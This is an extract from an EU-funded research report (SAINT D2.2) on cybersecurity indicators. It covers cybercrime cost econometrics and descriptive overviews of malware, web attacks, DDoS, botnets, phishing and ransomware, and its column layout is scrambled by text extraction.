The GSM supports the generation of screenshots for individual countries showing levels of cyber security activities which will be enhanced by the addition of the selected SAINT indicators. An example screenshot (of Germany) is illustrated in Figure 2-4 below. An illustrative screenshot of Finland follows in Figure 4-3. In a brief comparative summary, Germany has a high ranking on the SAINT GSM scale while Finland has a low ranking. A high rank equates to worse security. A country at #1, and top of the ranking, has the worse levels of cyber security on its Autonomous Systems. A country at the bottom of the ranking has the lowest levels of cybercriminal activity detected on its ASes.

Figure 4.2:Screenshot SAINT Global Security Map- sample country detail (Germany) – globalsecuritymap.com/saint

NB – Germany (DE) is ranked #8 of #218 countries measured for cybersecurity issues - the lower the # the more cybersecurity issues

Figure 4.3:Screenshot SAINT Global Security Map- sample country detail (Finland) – globalsecuritymap.com/saint

Finland (FI) is ranked #218 of #218 countries measured for cybersecurity issues - the lower the # the more cybersecurity issues

5 Indicators - Econometrics The meaning of econometrics is economic measurement12. In the strictest sense of the definition of econometrics, meaning the measurement of economic systems within an empirical context. Central to econometrics is the processing of economic data using mathematics and statistical procedures to prove the economic theory and support the economic model. This type of modelling tends to be qualitative in nature as illustrated by the demand theory and appropriate in terms of the cyber security industry. For example, to describe the demand theory in general terms, when there is a decrease in the price of goods there is a correlated increase in the demand for the goods or if there is an increase in the price of goods there follows a decrease in the demand for goods. The theory advances that these situations support a negative relationship between the price and the demand for the goods. Econometrics is used to verify the theory in relation to specific goods through the application of the data in relation to the price and demand for the goods. Mathematical and statistical tools are applied to the data to estimate quantitative parameters, in order to verify the theoretical predictions of the economic models. In terms of cyber security, the econometrics model can be used to create new models specific to the industry or to verify data relating to goods within the marketplace and differences in supply and demand. Such models can used to verify investment data within the cyber industry with a direct application to improving Return on Investment (ROI) calculations. This provides data which is of benefit to policy makers, governments, companies and organizations. 5.1 Online population experienced cybercrime (EU)

Nomenclature Metrics & Econometric analysis

There are two related definitions: Worldwide - 700 million people in 20 countries experienced some form of cybercrime 13., Cyber-dependent crimes are offences that can only be committed via a computer, ● an increase of 15% from 2014 (594 million people were computer network or other form of affected by cybertheft in 2014) information and communications ● with the 20 countries (including 7 from EU; FR, DE, IT, technology (ICT). These include not only NL, ES, SE, UK) the online population which experienced offences frauds that by their very cybercrime was 36.21% definition only occur online, for example, online shopping and auction scams SAINT survey of respondents shows the online population (where the victim buys supposedly which experienced cybercrime (EU Adult Population 2017 - legitimate goods through an internet site 378 million (Eurostat): that are fake or fail to be provided). Have you experienced a cybercriminal action in the last 12 Cyber-enabled crimes are traditional months? crimes that can be increased in their scale or reach by the use of ICT, but unlike ● 14.25% (of EU pop = 54 million) - Personal capacity cyber-dependent crimes, they can be ● 23.93% (of EU pop = 91 million) - At work committed without it, for example, ticket ● 9.12% (of EU pop = 34 million) - Personally and at work fraud (purchasing tickets in advance,

12 Econometrics - https://www.chegg.com/homework-help/definitions/econometrics-12 13 Cybercrime victims globally - 02 2018 - https://www.symantec.com/security-center/threat-report Copyright SAINT Consortium. All rights reserved. 28 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

which are never supplied or turn out not ● 52.71% (of EU pop = 199 million)- No to be valid), as well as non-fraud crimes, such as offences involving online Therefore, in total for the EU experiencing a cybercriminal harassment or obscene publications. action in the last 12 months.

● 47% in total of the EU population ● 177 million EU online users

EU - From SAINT’s comparative and econometric analysis14 in conjunction with 2017 Norton Cyber Security Insights Report, an annual survey of more than 21,000 consumers globally, the online EU population which experienced cybercrime was: ● 36.36% of the EU population ● 142 million EU people

5.2 Time spent / lost per victim of cybercrime

Nomenclature Metrics & Econometric analysis

The time spent or lost as result of being a Time spent by cybercrime victim (on average) in hours per victim of cybercrime in order to victim lost 2017 was16: determine and remediate the problems ● 23 hours caused. EU - From SAINT’s econometric analysis17 in conjunction with 2017 Norton Cyber Security Insights Report, an annual N.B. A new and important factor survey of more than 21,000 consumers globally, the online introduced, previously neglected within EU population in time spent by cybercrime victim the 2017 Norton Cyber Security Insights in hours per victim lost 2017 which experienced cybercrime Report (see 9.1 above) for the analysis of was: the costs of cybercrime and from SAINT’s ● 16 hours lost on average within EU per victim of econometric analysis15 cybercrime ● € 63 billion is the total cost the EU economy in time spent or lost as result of being a victim of cybercrime

5.3 Cost of cybercrime (EU)

Nomenclature Metrics & Econometric analysis

Understanding the scale or prevalence of Worldwide - 700 million people in 20 countries experienced cybercrime is also a key requirement for some form of cybercrime, at a direct cost of; 18.

14 SAINT surveys & comparative econometric analysis (to be published in 2018) 15 SAINT surveys & comparative econometric analysis (to be published in 2018) 16 Cybercrime victims globally - 02 2018 - https://www.symantec.com/security-center/threat-report 17 SAINT surveys & comparative econometric analysis (to be published in 2018) 18 Cybercrime victims globally - 02 2018 - https://www.symantec.com/security-center/threat-report

estimating the costs ● at a cost of $172 Billion from consumers in 20 Countries (including 7 from EU; FR, DE, IT, NL, ES, SE, UK)

EU - From SAINT’s econometric analysis19 in conjunction with 2017 Norton Cyber Security Insights Report, an annual survey of more than 21,000 consumers globally, the online EU population which experienced cybercrime was: ● € 31 billion as direct cost to the EU economy ● € 63 billion as an indirect cost the EU economy in time spent or lost

● = €94 billion as the total cost to the EU economy

5.4 Cost of a data breach

Nomenclature Metrics & Econometric analysis

The cost of an event in which an From the IBM/Ponemon 2017 report20 - 419 companies in individual’s name plus a medical record or 13 country or regional samples, the global average cost of a financial record or debit card is potentially data breach is down over previous years: at risk ● 2016 = €3.28 million - 2017= €2.97 million ● 10% one-year decrease in average total cost ● €116 is the average cost per lost or stolen records ● 11.4% one-year decrease in the per capita cost ● 27.7% is the likelihood of a recurring material data breach over the next two years ● 2.1% increase in the likelihood of a recurring material data breach ● The average size of a data breach increased 1.8% to 24,089 records

5.5 Cost to individuals of cybersecurity measures

Nomenclature Metrics & Econometric analysis

Desktop computers and laptops are SAINT survey with econometric analysis of respondents commonly targeted to gather passwords shows the online population spend on cyber security: or financial account information, or to construct a botnet to attack another What do you think the estimated spend was on cyber target. security by you personally in 2017?

Smartphones, tablet computers, smart

19 SAINT surveys & comparative econometric analysis (to be published in 2018) 20 Ponemon Institute’s 2017 Cost of Data Breach Study: Global Overview - 02 2017 - https://www- 01.ibm.com/common/ssi/cgi-bin/ssialias?htmlfid=SEL03130WWEN Copyright SAINT Consortium. All rights reserved. 30 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

watches, and other mobile devices such as ● <€100 42.86% quantified self-devices like activity ● €101-250 18.18% trackers have sensors such as cameras, ● €250-1000 5.19% microphones, GPS receivers, compasses, ● €1000+ 3.90% and accelerometers which could be exploited, and may collect personal information, including sensitive health information.

Wi-Fi, Bluetooth, and cell phone networks on any of these devices could be used as attack vectors, and sensors might be remotely activated after a successful breach.

5.6 Cost to enterprises of cybersecurity measures

Nomenclature Metrics & Econometric analysis

The wide range between the lower and According to research, carried out in 2015, the ideal spend higher ends of network security cost on cybersecurity is 9.8 to 13.7% of your I.T. budget21. correspond with the large variety of available solutions. The factors that should be taken to assess the budget for enterprises of cybersecurity measures: For smaller SME’s on the lower end of the spectrum systems such as business VPNs ● Discover the inventory of assets (end user devices, and email security solutions, which can applications, network devices, data repositories, supply help protect your business from specific chain/partners). threat types (such as phishing scams) on a ● Detect the vulnerabilities / weaknesses of these assets smaller scale. and establish which threats could compromise each of these. For medium size SME’s to large ● Determine and prioritize your investments in organisations higher-priced systems are technologies, skills, and processes (called controls and often full-featured network monitoring countermeasures). solutions with advanced security event ● Base decisions on the probability / impact matrix from logging and detection capabilities. They the Discover & Detect phase can help shield an organization from large- ● Deploy controls to shore up vulnerabilities across assets scale attacks on their network and predict to defend against given threats intrusions before they even happen. Based only on network security software. For small SME’s there are some free open-source systems. These can cost as little as €50 per year for limited threats e.g. VPN, email, anti-virus. On the higher end, systems can cost as much as €6,000 per year, with one smaller size system reaching

21 Determining How Much to Spend on Your IT Security - 2015 - https://www- 03.ibm.com/industries/ca/en/healthcare/documents/IDC_Canada_Determining_How_Much_to_spend_on_Security_- _Canadian_Perspective_2015.pdf

€24,000 for a single year of use. Overall, analysis reveals that in its first year using network security software, the average SME should budget to spend around $1,400 per annum22.

5.7 Cost to governments of cybersecurity measures

Nomenclature Metrics & Econometric analysis

Governments have conflicting priorities As a comparison: The amount the U.S. government spent in for expenditure; to bring transformative 2017 on cybersecurity was $14 billion. The US government change to their organizations, while intends to spend 19 billion in 201823 pursuing compliance-oriented priorities. Cloud solutions, cybersecurity and Gartner’s CIO Agenda Survey in 2018 gathered data from analytics are the top technologies 3,160 CIO respondents in 98 countries and across major targeted for new and additional spending, industries, including 461 government CIOs. 16% of while data centre infrastructure is the government CIOs said they plan to increase spending on most commonly targeted for cost savings. business intelligence and analytics (16%) and data Within the areas of cybersecurity management (6%) in 2018. consideration is made towards; security, The CIO survey found that digital business/digital safety and risk, governance, compliance transformation is more important for government first and regulations, and technology priority with the exception of defence and intelligence initiatives/improvements. agencies (6%), government are security, safety and risk (13%); governance, compliance and regulations (12%); and technology initiatives/improvements (11%)24.

5.8 Number of individuals working in cybersecurity (2018 EU)

Nomenclature Metrics & Econometric analysis

Cybersecurity professionals worldwide face In 2018, the US employs ~780,000 people in cybersecurity an ever-evolving threat landscape that positions25. In comparative terms population therefore, EU many feel they are ill-equipped to manage. should have been employing ~2 million by end of 2017 Data breaches at corporations, educational (actual number unknown). This would be at a cost of ~$15 institutions and government agencies billion. continue to erode public confidence in the state of cybersecurity. The emergence of At the same time, the cybersecurity industry is facing a consumer goods such as wearable devices gender gap, for example in the US, 50 percent or more of and self-driving cars, alongside the those graduating from college cybersecurity field increasing connectivity of the systems

22 Network Security Software – 2018 - https://www.capterra.com/network-security-software/ 23 US expenditure on cyber-security - 2018 - https://www.cio.com/article/3032553/cyber-attacks-espionage/obama- wants-more-cybersecurity-funding-and-a-federal-ciso.html 24 Gartner 2018 CIO Agenda Report – 2018 - https://www.gartner.com/technology/cio-trends/cio-agenda/ 25 US employed in cyber-security - 06 2017 - https://www.csoonline.com/article/3200024/security/cybersecurity- labor-crunch-to-hit-35-million-unfilled-jobs-by-2021.html Copyright SAINT Consortium. All rights reserved. 32 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

managing critical infrastructure such as power plants and traffic signals are creating new threats to public safety, privacy, and economic stability.

5.9 Estimates for cybersecurity personnel needed (by 2020 EU)

Nomenclature Metrics & Econometric analysis

US - nearly half the 4,000 businesses Currently (2018) there is an estimate that as many as 1 surveyed about their demand for million cybersecurity openings globally are going unfilled26. specialists in the field said they were finding it difficult to fill openings. This is There will be an estimated 3.5 million unfilled cybersecurity similar within the EU. jobs globally by 202027

The shortage is partly due to workers who Current estimates for the EU (based on %age of G20), are either unqualified or are qualified but predict that as many as 200,000 cybersecurity openings are not interested in this career path. Lack of going unfilled, and therefore a shortage of 700,000 by available training courses, also the 202028. increased demand for cybersecurity professionals is relatively new, and universities are still unable to respond to this demand by incorporating it in their curricula.

26 Mitigating the Cybersecurity Skills Shortage -2017 - http://www.cisco.com/c/dam/en/us/products/collateral/security/cybersecurity-talent.pdf 27 Unfilled cyber-security jobs - 2018 - https://cybersecurityventures.com/jobs/ 28 ENISA - Rome CTI Workshop - 11 2017 - CTI – EU | Bonding EU Cyber Threat Intelligence Copyright SAINT Consortium. All rights reserved. 33 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

6 Indicators - Cybercrime Activity As shown in Cyber Security in the European Union29 - Cybercrime "victimisation" surveys in 21 countries have revealed that the number of both individual and institutional victims is significantly higher than that for "conventional" forms of crime. Most of the fundamental foundations of EU views and laws on cybercrime & cybersecurity is “The Budapest Convention: The 2001 Convention on Cybercrime”, was the first global instrument to address cybercrime. Its main objective is to pursue a common criminal policy aimed at the protection of society against cybercrime, by adopting appropriate legislation and fostering international cooperation. The convention has been promoted by the Council of Europe (CoE) and it was signed by CoE members as well as several non-European countries including the US. Although all EU member states have signed the convention, several have not ratified it yet30. 6.1 Malware

Nomenclature Examples Usage Metrics

Malware is short for Malware is the general As of January 2019, five As of March 2019, there “malicious software” - term covering all the of the top 10 malware in were 876 million types computer programs different types of active circulation are of malware detected. designed to infiltrate threats to a computer involved with This also shows, that and damage computers security such as trojans, Cryptojacking, i.e. use of every day, there are without the users viruses, and worms. It a user’s computer, 350,000 new malicious consent. can also be termed as without consent, to programs (malware) and spyware, ransomware, mine cryptocurrencies. potentially unwanted adware, rootkit, Other malware primarily applications (PUA) are keylogger, and APT steals banking detected31. (advanced persistent credentials, user threat). Also a passwords, FTP Older malware still potentially unwanted passwords, session remains even though application (PUA) cookies and personal apparently non- data. operational, e.g. after 2 years since the control (C&C) was disabled. WannaCry virus is still shown to be on 500,000 infected computers worldwide, March 2019.

29 Cyber security in the European Union - 2013 - http://www.europarl.europa.eu/eplibrary/Cyber-security-in-the- European%20Union.pdf 30Budapest Convention on Cybercrime https://www.coe.int/en/web/conventions/full-list/-/conventions/treaty/185 31 AV Test – Mar 2019 https://www.av-test.org/en/statistics/malware/

The Top 10 malware – Jan 201932

• Coinhive – Cryptominer designed to perform online mining of Monero cryptocurrency when a user visits a web page without the user’s knowledge or approval, and without sharing the profits with the user. The implanted JavaScript uses great computational resources of the end users to mine coins and might crash the system. • XMRig – Open-source CPU mining software used for the mining process of the Monero cryptocurrency, and first seen in-the-wild on May 2017. • Jsecoin – JavaScript miner that can be embedded in websites. With JSEcoin, you can run the miner directly in your browser in exchange for an ad-free experience, in-game currency and other incentives. • Cryptoloot – Cryptominer, using the victim’s CPU or GPU power and existing resources for cryptomining – adding transactions to the blockchain and releasing new currency. It is a competitor to Coinhive, trying to pull the rug under it by asking a smaller percentage of revenue from websites. • Emotet – Advanced, self-propagate and modular Trojan. Emotet once used to employ as a banking Trojan, and recently is used as a distributor to other malware or malicious campaigns. It uses multiple methods for maintaining persistence and evasion techniques to avoid detection. In addition, it can be spread through phishing spam emails containing malicious attachments or links. • Nivdort – Multipurpose bot, also known as Bayrob, that is used to collect passwords, modify system settings and download additional malware. It is usually spread via spam emails with the recipient address encoded in the binary, thus making each file unique. • Dorkbot – IRC-based Worm designed to allow remote code execution by its operator, as well as the download of additional malware to the infected system. • Ramnit – Banking Trojan that steals banking credentials, FTP passwords, session cookies and personal data. • Smokeloader – Second-stage downloader for windows which is used to download other malwares or other plugins. Smokeloader uses various anti-analysis tricks that is used for deception and self- protection. Smokeloader is commonly used to load a lot of known families, including the Trickbot trojan, Azorult infostealer and Panda banker. • Authedmine – A version of the infamous JavaScript miner CoinHive. Similarly to CoinHive, Authedmine is a web-based crypto miner used to perform online mining of Monero cryptocurrency when a user visits a web page without the user’s knowledge or approval the profits with the user. However unlike CoinHive, Authedmine is designed to require the website user’s explicit consent before running the mining script Also top 3 malware for mobiles (Android)

• Triada – Modular Backdoor for Android which grants super user privileges to downloaded malware, as helps it to get embedded into system processes. Triada has also been seen spoofing URLs loaded in the browser. • Guerilla– Android ad-clicker which has the ability to communicate with a remote command and control (C&C) server, download additional malicious plugins and perform aggressive ad-clicking without the consent or knowledge of the user. • Lotoor– Hack tool that exploits vulnerabilities on Android operating system in order to gain root

32 Top 10 malware – Jan 2019 https://blog.checkpoint.com/2019/01/14/december-2018-most-wanted-malware- smokeloader-crypto-malware-ransomware/ Copyright SAINT Consortium. All rights reserved. 35 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

privileges on compromised mobile devices. 6.1.1 Trojans A Trojan (similar to the story of the Trojan Horse of Troy) hides malware in what appears to be a normal file. There are a wide variety of Trojan viruses on the Internet landscape that can perform any number of tasks. Most Trojans are typically aimed at taking control of a user’s computer, stealing data and inserting more malware in the victim’s computer. 6.1.2 Viruses (computer) Viruses are unique from other forms of malware in that they are contagious, i.e., self-replicating — capable of copying themselves across files or other computers without the user's consent. 6.1.3 Worms A worm is a malware type that targets an entire network of devices, moving from one computing device to another. 6.2 Web based attacks

Nomenclature Examples Usage Metrics

Web based attacks ● NewskyAG - money Scanning for web server From earlier (2009): primarily target mule scam. vulnerabilities and cross 350,000 affected information security ● ESTdomains - server attacks. Recently websites and servers infrastructures and cybercrime group. used in some DDos, and worldwide, with constantly evolve. These ● Microsoft Update data breaches. 103,351 attacks, legacy networks based Fixes RCE (Remote involving 2,743 unique attacks have largely Code Execution) IP addresses, with 85 been replaced by more Vulnerability - countries involved in RFI sophisticated primarily aimed @ (remote file inclusion), web application-based MS Server 2016 33. LFI (local file inclusion), attacks (see below). XSA (cross server attack), and RCE (remote code execution), scanning and 911 ASNs were involved34.

6.2.1 RFI (remote file inclusion), Remote File Include (RFI) is an attack technique used to exploit "dynamic file include" mechanisms in web applications. When web applications take user input (URL, parameter value, etc.) and pass them into file include commands, the web application might be tricked into including remote files with malicious code.

33 Microsoft Security Advisory 4022344 - May 2017 - https://docs.microsoft.com/en-us/security- updates/SecurityAdvisories/2017/4022344 34 MALfi, A Cybercrime International Report - A Silent Threat - 2009 https://en.wikipedia.org/wiki/Jart_Armin Copyright SAINT Consortium. All rights reserved. 36 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

6.2.2 LFI (local file inclusion), Local File inclusion (LFI), or simply File Inclusion, refers to an inclusion attack through which an attacker can trick the web application in including files on the web server by exploiting functionality that dynamically includes local files or scripts. 6.2.3 XSA (cross server attack), XSA (also known as Cross-Server Attack) is a networking security intrusion method which allows for a malicious client to compromise security over a website or service on a server by using implemented services on the server that may not be secure. 6.2.4 RCE (remote code execution) RCE is a vulnerability that allows an attacker to execute code on a target device via a MitM (Man in the Middle) attack. This attack also involved code injection inside of the update framework. An RCE vulnerability in any of these applications allows attacker-supplied code to run with the privileges of its host app. 6.3 Web application attacks

Nomenclature Examples Usage Metrics

A web application is The web applications SQL Injection and Cross- Example: Healthcare: defined as a client- are targeted for various Site Scripting were the Top 5 Web Application server-based software purposes such as most common attacks, Attacks in 201735: system. It is configured stealing sensitive representing on the server and usable corporate data. approximately 68% of • SQL Injection – 46.0% by the client through a the total number of • Denial of Service – web browser. The web attacks. SQL Injection is 22.8% applications are a vital used to access sensitive • Cross-Site Scripting – part of online presence. information or run OS 16.0% Examples of web commands for further • Path Traversal – 5.7% applications are the penetration of a system, • Local File Inclusion – webmail systems, while Cross-Site 4.5% websites, online Scripting is • Other Web databases, and online directed against Application Attacks – banking systems. application users. 5% (e.g. OS Attacks against users Commanding – also were ranked first among known as Command web application Injection, Information threats most common in Leakage, XML 2016. Injection).

35 Healthcare: Top 5 Web Application Attacks in 2017 https://www.calyptix.com/hipaa/healthcare-top-5-web- application-attacks-in-2017/ Copyright SAINT Consortium. All rights reserved. 37 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

6.4 Denial of Service (DoS, DDoS, DrDoS)

Nomenclature Examples Usage Metrics

A denial-of-service DDoS usage is to mask HTTP and HTTPS As shown in fig # (below), attack (DoS attack) with phishing attacks, attacks -- including the size of a typical DDos traffic from a single masking ongoing data SYN floods, ACK attack has grown source or Distributed breaches, malvertising floods, and significantly - examples: Denial of Service (DDoS), attacks, intimidation, application-layer a distributed reflection and for corporate attacks -- remain ● In 2008 the DDoS attack denial of service (DrDoS) ransom. the dominant type disabling Georgia attack. All denial-of- of DDoS attacks government and financial service attacks are an services (preceding the attempt to make an RU invasion) was 30 online service MByte / second. unavailable or disrupt From 2014 an online service by reflection denial of overwhelming it with service (DrDoS) Of recent DDoS attacks: traffic from multiple attacks began to sources. They primarily gain ground. From ● Spamhaus (2013) = target a wide variety of late 2018 300Gbps important resources, Memcached ● CloudFlare Client (2014) = from banks to news amplification 400Gbps NTP websites, and present a method attacks Amplification major challenge to have emerged. ● Hong Kong (2014) = making sure people can 500Gbps publish and access important information. In March 2018:

● Akamai confirmed a 1.3Tbps DrDoS attack against GitHub ● A 1.7Tbps (1,300 Gbps) DrDoS targeted at a customer of a U.S. based Service Provider. This recent DrDoS attack contained a ransom demand for 50 XMR (Monero), valued at about €15,000 to stop the attack.

Figure 6.1:Peak sizes of DDoS 2007- 03/2018 - Arbor Networks 36

There are basically five types of DDoS attacks37: TCP Connection Attacks Also known as occupying connections, these attempt to use up all the available connections to infrastructure devices such as load-balancers, firewalls and application servers. Even devices capable of maintaining state on millions of connections can be taken down by these attacks. Volumetric Attacks - Using up bandwidth These attempt to consume the bandwidth either within the target network/service, or between the target network/service and the rest of the Internet. These attacks are simply about causing congestion.

36 1.7 Tbps DDoS Attack; The Terabit Attack Era Is Upon Us - March 5 2018 .https://www.arbornetworks.com/blog/asert/netscout-arbor-confirms-1-7-tbps-ddos-attack-terabit-attack-era-upon- us/ 37 Digital Attack Map- 2018 - https://www.digitalattackmap.com/understanding-ddos/ Copyright SAINT Consortium. All rights reserved. 39 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

Fragmentation Attacks - Pieces of packets These send a flood of TCP or UDP fragments to a victim, overwhelming the victim's ability to re-assemble the streams and severely reducing performance. Application Attacks - Targeting applications These attempt to overwhelm a specific aspect of an application or service and can be effective even with very few attacking machines generating a low traffic rate (making them difficult to detect and mitigate). Memcached - In early 2018, a new and very threatening DrDoS technique has emerged. This is an opensource distributed memory object caching system which is generic in nature but often used for speeding up dynamic web applications. In the default configuration, Memcached listens on port 11211/tcp and (up to including version 1.5.5) also on port 11211/udp. Memcached servers openly accessible from anywhere on the Internet via UDP are abused for DDoS reflection attacks against third parties on a regular basis, i.e. DrDoS. On February 28 2018, the version control hosting service GitHub was hit with a massive denial of service attack, with 1.35 TB per second of traffic hitting the popular site. Although GitHub was only knocked offline intermittently and managed to beat the attack back entirely after less than 20 minutes, the sheer scale of the assault was worrying, as it outpaced the Dyn attack, which had peaked at 1.2 TB a second. Just days after the GitHub attack, another Memcached-based DrDoS attack on a U.S. service provider with 1.7 TB per second of data. The German Government via CERT-Bund have released (04 2018) a Crisis- Management report on Open-Memcached-Servers due to reports of extensive abuse of Memcached servers and the extent of DrDoS emanating from German based server complexes. A solution for ISPs and hosts is listed below 38. ● Do not expose your Memcached server to the Internet! ● Restrict access to the Memcached server to trusted systems (e. g., the web application server) in the server's configuration and/or by blocking incoming connections from the Internet to ports 11211/tcp and 11211/udp on the firewall. ● The UDP port is usually not required. Start Memcached with option '-U 0' to disable it. ● Keep your Memcached installation up-to-date. Install available security updates asap. The earlier Mirai botnet (2016) was significant in that, unlike most DDoS attacks, it leveraged vulnerable IoT devices rather than PCs and servers, It should be noted that by 2020, there will be 34 billion internet connected devices, and the majority (24 billion) will be IoT devices39. It is unlikely that Mirai will be the last IoT-powered botnet. An investigation across security teams within Akamai, Cloudflare, Flashpoint, Google, RiskIQ and Team Cymru uncovered a similarly sized botnet, dubbed WireX, based on 100,000 compromised Android devices within 100 countries. A series of large DDoS attacks that targeted content providers and content delivery networks prompted the investigation.40

38 Openly accessible Memcached servers - April 2018 - https://www.bsi.bund.de/EN/Topics/IT-Crisis- Management/CERT-Bund/CERT-Reports/HOWTOs/Open-Memcached-Server/open-Memcached-server_node.html 39 There will be 24 billion IoT devices installed on Earth by 2020 - http://www.businessinsider.com/there-will-be-34- billion-iot-devices-installed-on-earth-by-2020-2016-5?international=true&r=US&IR=T 40 DDoS explained: How distributed denial of service attacks are evolving - 12 Mar 2018 https://www.csoonline.com/article/3222095/network-security/ddos-explained-how-denial-of-service-attacks-are- evolving.html Copyright SAINT Consortium. All rights reserved. 40 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

6.5 Botnets

Nomenclature Examples Usage Metrics

A botnet refers to a Some common types Usage for The largest known botnets - in group of computers, of botnet include: anonymous spam capacity - Srizbi (2008) with mobile devices, or distribution of spam, 60 billion/day. Both in 2009, in devices connected DDoS attacks, size of infected bots, were to the Internet (IoT) ● Denial of service, information theft, Mariposa with <12 million which have been DDoS, and DrDoS blackmail, devices infected, followed by infected by malware attacks ransomware, bitcoin Conficker a worm delivery / and have come ● Malware mining and spreading botnet with an under the control of distribution extortion. Botnets unknown purpose. <11 million a malicious actor or ● Email spambots and have also evolved to devices were infected, including foreign nation state. forum spambots become highly machines at the UK’s Ministry of ● Click- fraud bots efficient malicious Defence and Germany’s unified Protocols such as that artificially software distribution armed forces, Bundeswehr. HTTP(S), SSL and increase traffic and networks used by ICMP have come to increase PPC cybercriminals. In 2009 - Reportedly it cost one the fore as revenue. Fellow UK council £1.4 million to compared to earlier ● Cheating game bots cybercriminals pay recover from a Conficker IRC alternatives. to acquire in-game for access to infection, while Quest (Fr) items and currency. compromised complained French fighter planes ● Warez - search hard systems controlled were grounded because of the drives for software by a botnet’s C&C worm. and licenses (command and installed on a control) to deliver 2013 - 9 million + unique IP victim’s PC’s to even more malware addresses that were victims of transfer for to already-infected botnets in 2013 - with an duplication and computers. estimated 3,500 known botnets distribution. worldwide41 ● Keylogging threat to individual's 2013/2015 - Black Atlas attackers privacy. using multiple PoS (Point of Sale) ● Bitcoin mining malware programs including botnets Alina, NewPOSThings and BlackPOS. The latter was also used in the 2013 attack against Target that resulted in the compromise of around 40 million payment card details.

In Oct 2016 - the Mirai (ransomware / DNS) botnet had more than doubled from 213,000 to 493,000 infected devices (bots), after source code was

41 The state of botnets in late 2015 and early 2016 - https://blog.trendmicro.com/the-state-of-botnets-in-late-2015- and-early-2016/

posted online.42

Key early botnets: The earliest cybercriminal spam botnets were Bagle and Bobax - 2004. RuStock (spam), Cutwail (malware), Srizbi (spam), Storm - spread via spam and specifically targeted some security vendors/researchers - 2007. ASProx & RuStock (spam), Zeus (AKA - Zbot, PRG, Wsnpoem, Gorhax, Kneber) Steals banking- related and other financial data, also Waledac, Nucrypt - from 2008. Mega-D - Aka Ozdok - Responsible for 30% of world's spam, DOWNAD/Conficker - Generated 50,000 alternative C&C server names per day. KOOBFACE - Sent out spam on social networking sites and created malicious phishing posts on users' walls - 2009. A recent major botnet: Mirai - shut down major elements of the internet, including Twitter, Netflix, CNN, and other major sites, as well as major Russian banks and the entire country of Liberia. The botnet took advantage of unsecured internet of things (IoT) devices such as security cameras, installing malware that then attacked the DYN servers that route internet traffic43. - 2016 - 2017 6.6 Phishing

Nomenclature Examples Usage Metrics

Phishing is a fraudulent Emails: Phishing uses link 8 percent of malicious attempt, usually made manipulation, image email attachments were through email, to steal ● Generic greeting: filter evasion and docm files (a type of personal information. Phishing emails are website forgery to fool Microsoft Word XML file usually sent in large Web users into thinking that executes macros) - batches. that a spoofed website e.g. distributing the ● Forged link: Even if a is genuine and Dridex banking trojan44. Spear phishing: the link has a recognized legitimate. Once the fraudulent practice of name, it doesn't user enters vital 1 in 131 emails sending emails mean it links to the information, he (phishing) contained ostensibly from a known real organization. immediately becomes a malware in 2016, the or trusted sender in ● Requests personal phishing victim. highest rate in 5 years.45 order to induce targeted information: The individuals to reveal point of sending

42 MIRAI BOTS MORE THAN DOUBLE SINCE SOURCE CODE RELEASE - Oct 2016 https://threatpost.com/mirai-bots- more-than-double-since-source-code-release/121368/ 43 What is a botnet? And why they aren't going away anytime soon - https://www.csoonline.com/article/3240364/hacking/what-is-a-botnet-and-why-they-arent-going-away-anytime- soon.html 44 Malicious spam attachments - 2017 - http://www.grouppbs.com/wp- content/uploads/2017/02/Cisco_2017_ACR_PDF.pdf 45 Phishing statistics - 2018 - https://blog.barkly.com/phishing-statistics-2017 Copyright SAINT Consortium. All rights reserved. 42 D2.2 Final Report on Cybersecurity Indicators & Open Source Intelligence Methodologies

confidential phishing email is to information, often to trick the recipient gain access to a into providing corporate system. personal information. ● Sense of urgency: Internet criminals want to obtain personal information now. The faster they get information, the faster they can move on to another victim.

Figure 6.2: Top 10 phishing email subjects for 4th quarter 201846

6.7 Ransomware

Nomenclature Examples Usage Metrics

Ransomware is a subset The number of Primarily financial Cybercriminals took in of malware in which the ransomware families extortion about $2 Million a

46 https://blog.knowbe4.com/topic/top-clicked-phishing-email-subjects

data on a victim's increased from 30 in Ransomware attacks month in 2017, based computer is locked, 2015 to 98 in 2016, and worldwide51: on money coming into typically by encryption, 100 new malware ● 2014 - 3.2 million ransomware-related and payment is families were ● 2015 - 3.8 million Bitcoin wallets53. This demanded before the introduced in 2017 47. ● 2016 - 638 million includes: ransomed data is Ransomware developers ● More than $50 decrypted and access is have been increasingly Post NotPetya, after the million each for returned to the victim. demanding popular initial infection, the three wallets cryptocurrency bitcoin attackers are now using associated with the in recent years. Private a combination of Locky ransomware, coins such as Monero Mimikatz, PsExec, WMI, and a fourth one that and Zcash are now the and combined with processed close to most popular with stolen NSA tools to steal $70 million. cybercriminals in credentials and ● Cryptowall brought 201848, continue spreading from in close to $100 “NotPetya” ransomware machine to machine, million cyber-attack, with holding data ransom or ● CryptXXX gathered in Nurofen maker Reckitt destroying the data52. $73 million Benckiser taking an ● Cerber took in $54 estimated £100m hit in million revenue49. ● Compared to the Moller-Maersk puts cost detected earnings of of NotPetya attack at up $140,000 made by to $300m50. WannaCry and $10,000 by NotPetya

6.8 Exploit kits

Nomenclature Examples Usage Metrics

An exploit kit or exploit RIG exploit kit remains Examples of recent A classic case is Paunch pack is a type of toolkit one of the most popular usage of exploit kits: (Dmitry Fedotov). cybercriminals use to exploit kits (2018) used “Paunch was the

